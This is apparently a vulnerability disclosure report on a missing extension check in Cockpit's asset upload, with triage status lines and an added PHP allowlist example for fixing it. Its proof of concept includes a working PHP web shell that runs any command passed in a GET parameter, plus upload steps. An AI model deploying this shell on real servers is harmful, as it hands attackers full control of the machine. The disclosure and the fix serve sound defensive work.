File Upload Bypass Leads to Remote Code Execution (RCE) in cockpit-hq/cockpit
Valid
Reported on
Mar 9th 2023
Description
There are no extension checks during file upload. An attacker may upload a file to execute malicious code on the server.
Proof of Concept
Step 1: Create a file with the content below and save it as evil.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
Step 2: Login to the Cockpit web server
Step 3: Go to assets
Step 4: Upload Assets
Step 5: Upload the file that was created.
Step 6: Copy the asset link and paste it in a new tab.
Step 7: Any command can now be executed.
Impact
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.
I am able to gain access to the whole compromised machine.
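The extension check that the description says is missing could look like the following. This is an added example, not code from the report or from cockpit-hq/cockpit; the function name `safe_asset_name` and the allowlist contents are assumptions chosen for illustration.

```php
<?php
// Added example: hypothetical helper, not Cockpit's own code.
// The allowlist is constructed for illustration; set it to the asset types you need.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf', 'txt'];

/**
 * Returns a safe storage name for an uploaded file, or null to reject it.
 */
function safe_asset_name(string $clientName): ?string
{
    // Reject NUL bytes and other control characters outright.
    if (preg_match('/[\x00-\x1f\x7f]/', $clientName)) {
        return null;
    }
    // Drop any directory part, then trailing dots and spaces ("evil.php.").
    $name = rtrim(basename(str_replace('\\', '/', $clientName)), '. ');
    // Dotfiles such as .htaccess and names without an extension are rejected.
    if ($name === '' || $name[0] === '.' || strpos($name, '.') === false) {
        return null;
    }
    // Every dot-separated segment after the base name must be allowlisted,
    // so "evil.php.jpg" and "evil.pHp" are both refused. This is deliberately
    // strict: "report.final.pdf" is refused as well.
    $segments = explode('.', strtolower($name));
    array_shift($segments);
    foreach ($segments as $ext) {
        if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
            return null;
        }
    }
    // Store under a random name; only the validated final extension survives.
    return bin2hex(random_bytes(16)) . '.' . end($segments);
}

// Constructed sample file names, including the evil.php from the proof of concept.
$samples = ['photo.JPG', 'evil.php', 'evil.php.jpg', 'evil.pHp',
            '.htaccess', 'evil.php.', "a.php\0.png", 'report.final.pdf'];
foreach ($samples as $n) {
    printf("%-20s => %s\n", json_encode($n), safe_asset_name($n) ?? 'REJECTED');
}
```

An extension allowlist does not inspect file contents, so the upload directory should also be served without script execution.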
Occurrences
We are processing your report and will contact the cockpit-hq/cockpit team within 24 hours.
2 months ago
We have contacted a member of the cockpit-hq/cockpit team and are waiting to hear back.
2 months ago
Assets.php#L129-L180 has been validated